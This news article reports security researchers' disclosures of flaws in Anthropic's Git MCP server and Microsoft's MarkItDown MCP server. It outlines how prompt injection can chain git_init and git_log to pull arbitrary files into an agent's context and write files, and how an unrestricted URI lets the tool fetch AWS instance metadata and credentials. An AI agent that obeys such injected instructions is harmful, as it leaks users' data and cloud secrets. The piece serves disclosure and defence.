Anthropic, Microsoft MCP Server Flaws Shine a Light on AI Security Risks
Vulnerabilities disclosed this week in MCP servers from Anthropic and Microsoft put a spotlight on security concerns about a protocol that is being widely adopted in the agentic AI era.
From Incident to Insight: How Forensic Recovery Drives Adaptive Cyber Resilience
Vulnerabilities disclosed this week in MCP servers from Anthropic and Microsoft put a spotlight on security concerns about a protocol that is being widely adopted in the agentic AI era.Security researchers with AI security startup Cyata this week reported finding three vulnerabilities in the Git MCP server maintained by Anthropic, the AI company that created the Model Context Protocol to give AI models and agents a standardized way of accessing external data, tools, and services.The same day, BlueRock Security, which offers a runtime security platform, wrote that their researchers found a server-side request forgery (SSRF) vulnerability in MarkItDown, Microsoft’s popular MCP server, and that further analysis of more than 7,000 MCP servers found that 36.7% could be exposed to the security flaw.These latest reports not only highlight ongoing security concerns about MCP servers, but also the general risk-and-reward nature of AI technologies, from large language models (LLMs) to agents.“We’re rushing toward a new connectivity standard with the Model Context Protocol … essentially a universal USB port for AI,” said Uma Reddy, founder and executive vice president of product and technology for cloud and endpoint security company Uptycs. “It’s powerful, but it also introduces serious supply-chain risk. Plugging an LLM directly into the internet or internal systems without guardrails is like leaving your digital front door wide open.”Reddy added that “downloading an MCP server today feels like the early days of the internet. You might be getting a useful tool, or you might be installing a supply-chain implant. Security leaders need to apply the same zero-trust discipline to AI connections that they do to any other privileged access.”MCP’s ‘Double-Edge Sword’In a blog post last year, Jesse Griggs, senior threat researcher at cybersecurity firm Red Canary, wrote about he called the “double-edged sword of MCP,” noting that securing MCP servers is comparable to securing any code execution environment. As with Python or PowerShell, which also can perform a broad array of actions on a system – including harmful ones if not properly secured – MCP, by enabling AI agents to execute code and interact with resources, brings similar risks.“MCP by itself does not include security mechanisms,” Griggs wrote. “The absence of built-in security is not a defect, but instead emphasizes the expectation that developers will implement standard security best practices. MCP enables powerful capabilities through tool execution, and with this functionality comes important security and trust considerations that all developers must carefully address.”Three Anthropic VulnerabilitiesAccording to Yarden Porat, core team engineer for Cyata, the three vulnerabilities – tracked as CVE-2025-68143, CVE-2025-68145, and CVE-2025-68144 – in Anthropic’s Git MCP server can be exploited via prompt injection attacks, in which a bad actor inserts malicious instructions into the user input or external data to cause the AI model to bypass its safety rules.The three flaws could be chained together to create a remote code execution exploit. The security flaws can let an attacker access git repository on the system, not only the one initially configured for it, and could create a new git repository in any directory on the filesystem.“Combine these two, and you have a powerful primitive,” Porat wrote. “Take any directory … turn it into a git repository with git_init, then use git_log or git_diff to read its contents. The files get loaded into the LLM context, effectively leaking sensitive data to the AI.”Then a bad actor could abuse CVE-2025-68114 to delete a file or write in any file. Cyata alerted Anthropic to the vulnerabilities, with the AI company fixing them late last year. Organizations should update the Git MCP server to version 2025.12.18 or later, he wrote.SSRF Risks in MarkItDown MCPIn the case of Microsoft and its MarkItDown MCP server, the security gap is about file conversion. MarkItDown is a Python tool used to convert files like PDFs, HTML, and Word to Markdown, a lightweight and simpler language that AI systems can understand. Microsoft created a MCP server for MarketItDown to help LLMs get this conversion done. Users give MarkItDown a uniform resource identifier (URI), and MarkItDown fetches the files that are in there.That said, there are no real restrictions on the URI, according to David Onwukwe, principal solutions engineer at BlueRock.“This vulnerability allows an attacker to execute the Markitdown MCP tool convert_to_markdown to call an arbitrary … URI,” Onwukwe wrote in a report. “The lack of any boundaries on the URI allows any user, agent or attacker calling the tool to access any http or file resource.”BlueRock ran its research into the vulnerability on Amazon Web Services (AWS) EC2 instances running Instance Metadata Service Version 1 (IDMSv1), an older and less secure method for retrieving metadata that also can affect any cloud provider using it.That’s where the threat of SSRF comes in. Users can use the MarkItDown MCP to query the instance metadata a system, but in some circumstances, they also can obtain credentials for the instance, giving them access of AWS account data like secret keys.“Depending on the level of access the EC2 role has, this could lead to full admin access of the AWS account,” he wrote. “If the user has configured this MCP server on HTTP, the metadata can be queried from a remote server.”The ‘Iceberg Problem’The vulnerability shows how traditional security focuses on prompts – what agents are asked to do, Onwukwe wrote. However, the real risk is in what the AI agent does when it runs. Focusing on the request layer means that security teams are missing what MCP servers do, from fetching URLs and reading files to executing code and accessing data.“This is the iceberg problem,” he said. “Gateways see tool requests – the tip. But the real exposure is below the waterline: the runtime layer where agents access internal resources, exfiltrate data, and escalate privileges. That’s where this vulnerability lives. And that’s where the next hundred vulnerabilities will live, too.”
